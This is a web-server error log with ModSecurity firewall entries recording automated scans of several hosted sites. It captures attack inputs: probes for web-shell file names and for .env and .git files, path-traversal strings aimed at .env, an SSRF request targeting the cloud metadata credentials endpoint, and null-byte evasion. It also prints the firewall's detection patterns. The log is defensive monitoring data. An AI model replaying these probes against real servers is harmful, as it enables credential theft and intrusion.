[Tue May 12 05:21:30.167870 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/jga.php
[Tue May 12 05:21:30.566176 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/gelio1.php
[Tue May 12 05:21:30.962403 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/222.php
[Tue May 12 05:21:31.631950 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/666.php
[Tue May 12 05:21:32.024209 2026] [security2:error] [pid 1820198:tid 1820207] [client 43.164.196.244:54008] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agKcvM1tk6y7yBJLpJo3zwAAAIc"]
[Tue May 12 05:21:32.395747 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/166.php
[Tue May 12 05:21:32.784869 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/classwithtostring.php
[Tue May 12 05:21:33.198916 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/tool.php
[Tue May 12 05:21:33.593510 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/file61.php
[Tue May 12 05:21:34.264217 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/atomlib.php
[Tue May 12 05:21:34.700714 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/elp.php
[Tue May 12 05:21:35.393795 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/wp-blog-header.php
[Tue May 12 05:21:35.971153 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/gk.php
[Tue May 12 05:21:36.390488 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/wen.php
[Tue May 12 05:21:36.792705 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/cilus.php
[Tue May 12 05:21:37.196050 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/wp-p2r3q9c8k4.php
[Tue May 12 05:21:37.607498 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/tires.php
[Tue May 12 05:21:38.533222 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/wp9.php
[Tue May 12 05:21:38.950171 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/xltt.php
[Tue May 12 05:21:39.343445 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/menu.php
[Tue May 12 05:21:39.749855 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/1.php
[Tue May 12 05:21:40.164678 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/wp-access.php
[Tue May 12 05:21:40.560599 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/wp-png.php
[Tue May 12 05:21:41.010695 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/144.php
[Tue May 12 05:21:41.819814 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/asasx.php
[Tue May 12 05:21:42.209318 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/asd.php
[Tue May 12 05:21:42.618702 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/ws75.php
[Tue May 12 05:21:43.012361 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/academy.php
[Tue May 12 05:21:43.560701 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/ws86.php
[Tue May 12 05:21:44.092368 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/b.php
[Tue May 12 05:21:44.500443 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/amax.php
[Tue May 12 05:21:44.914639 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/as.php
[Tue May 12 05:21:46.454548 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/xa.php
[Tue May 12 05:21:46.844467 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/kj.php
[Tue May 12 05:21:47.274837 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/gettest.php
[Tue May 12 05:21:47.832198 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/fff.php
[Tue May 12 05:21:48.236449 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/ortasekerli1.php
[Tue May 12 05:21:48.652821 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/gifclass.php
[Tue May 12 05:21:49.217027 2026] [:error] [pid 1825287:tid 1825328] [client 193.24.211.101:35299] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 05:21:49.267315 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/motu.php
[Tue May 12 05:21:49.846026 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/Sanskrit.php
[Tue May 12 05:21:50.245941 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/green.php
[Tue May 12 05:21:50.660281 2026] [:error] [pid 1808852:tid 1808861] [client 20.226.81.141:42971] File does not exist: /home/cpcentre/public_html/ws83.php
[Tue May 12 05:21:54.468943 2026] [security2:error] [pid 1820198:tid 1820214] [client 216.73.216.110:11633] ModSecurity: Warning. Matched phrase "etc/modules" at ARGS:path. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/modules found within ARGS:path: /etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKc0s1tk6y7yBJLpJo35AAAAI4"]
[Tue May 12 05:21:54.469428 2026] [security2:error] [pid 1820198:tid 1820214] [client 216.73.216.110:11633] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKc0s1tk6y7yBJLpJo35AAAAI4"]
[Tue May 12 05:21:54.555459 2026] [security2:error] [pid 1820198:tid 1820214] [client 216.73.216.110:11633] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKc0s1tk6y7yBJLpJo35AAAAI4"]
[Tue May 12 05:21:56.438984 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.238:54010] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.git/logs/HEAD"] [unique_id "agKc1Nr1yOh9TvizezidZQAAAEs"]
[Tue May 12 05:21:56.438993 2026] [security2:error] [pid 1825287:tid 1825314] [client 45.148.10.238:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKc1AgpmE1yW0glLdgsJwAAAMk"]
[Tue May 12 05:21:56.439131 2026] [security2:error] [pid 1825287:tid 1825314] [client 45.148.10.238:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKc1AgpmE1yW0glLdgsJwAAAMk"]
[Tue May 12 05:21:56.439132 2026] [security2:error] [pid 1825179:tid 1825209] [client 45.148.10.238:54010] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.git/logs/HEAD"] [unique_id "agKc1Nr1yOh9TvizezidZQAAAEs"]
[Tue May 12 05:21:56.439240 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.238:54168] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mail.letamsgarage.fr"] [uri "/_next/image"] [unique_id "agKc1BfeipD4uoG21FousQAAAA4"]
[Tue May 12 05:21:56.439277 2026] [security2:error] [pid 1820198:tid 1820211] [client 45.148.10.238:54030] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.git/index"] [unique_id "agKc1M1tk6y7yBJLpJo35gAAAIs"]
[Tue May 12 05:21:56.446704 2026] [security2:error] [pid 1820198:tid 1820211] [client 45.148.10.238:54030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.git/index"] [unique_id "agKc1M1tk6y7yBJLpJo35gAAAIs"]
[Tue May 12 05:21:56.448418 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.238:54144] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.git/HEAD"] [unique_id "agKc1BfeipD4uoG21FousgAAABI"]
[Tue May 12 05:21:56.448464 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.238:54108] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.git/config"] [unique_id "agKc1BfeipD4uoG21FouswAAAAg"]
[Tue May 12 05:21:56.448580 2026] [security2:error] [pid 1808852:tid 1808873] [client 45.148.10.238:54144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.git/HEAD"] [unique_id "agKc1BfeipD4uoG21FousgAAABI"]
[Tue May 12 05:21:56.448619 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.238:54108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.git/config"] [unique_id "agKc1BfeipD4uoG21FouswAAAAg"]
[Tue May 12 05:21:56.450130 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.238:54146] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKc1M1tk6y7yBJLpJo36AAAAIQ"]
[Tue May 12 05:21:56.450238 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.238:54146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKc1M1tk6y7yBJLpJo36AAAAIQ"]
[Tue May 12 05:21:56.450356 2026] [security2:error] [pid 1820198:tid 1820204] [client 45.148.10.238:54146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKc1M1tk6y7yBJLpJo36AAAAIQ"]
[Tue May 12 05:21:56.458180 2026] [security2:error] [pid 1825179:tid 1825222] [client 45.148.10.238:53998] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc1Nr1yOh9TvizezidaAAAAFg"]
[Tue May 12 05:21:56.458264 2026] [security2:error] [pid 1825179:tid 1825222] [client 45.148.10.238:53998] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc1Nr1yOh9TvizezidaAAAAFg"]
[Tue May 12 05:21:56.458300 2026] [security2:error] [pid 1825179:tid 1825222] [client 45.148.10.238:53998] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc1Nr1yOh9TvizezidaAAAAFg"]
[Tue May 12 05:21:56.458523 2026] [security2:error] [pid 1825179:tid 1825222] [client 45.148.10.238:53998] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc1Nr1yOh9TvizezidaAAAAFg"]
[Tue May 12 05:21:56.458594 2026] [security2:error] [pid 1825179:tid 1825222] [client 45.148.10.238:53998] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc1Nr1yOh9TvizezidaAAAAFg"]
[Tue May 12 05:21:56.458640 2026] [security2:error] [pid 1825179:tid 1825222] [client 45.148.10.238:53998] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc1Nr1yOh9TvizezidaAAAAFg"]
[Tue May 12 05:21:56.459008 2026] [security2:error] [pid 1825179:tid 1825222] [client 45.148.10.238:53998] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1/health"] [unique_id "agKc1Nr1yOh9TvizezidaAAAAFg"]
[Tue May 12 05:21:56.460109 2026] [security2:error] [pid 1808852:tid 1808869] [client 45.148.10.238:54168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/_next/image"] [unique_id "agKc1BfeipD4uoG21FousQAAAA4"]
[Tue May 12 05:21:56.484725 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.238:54156] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.git/refs/heads/master"] [unique_id "agKc1Nr1yOh9TvizezidZwAAAE8"]
[Tue May 12 05:21:56.484909 2026] [security2:error] [pid 1825179:tid 1825213] [client 45.148.10.238:54156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.git/refs/heads/master"] [unique_id "agKc1Nr1yOh9TvizezidZwAAAE8"]
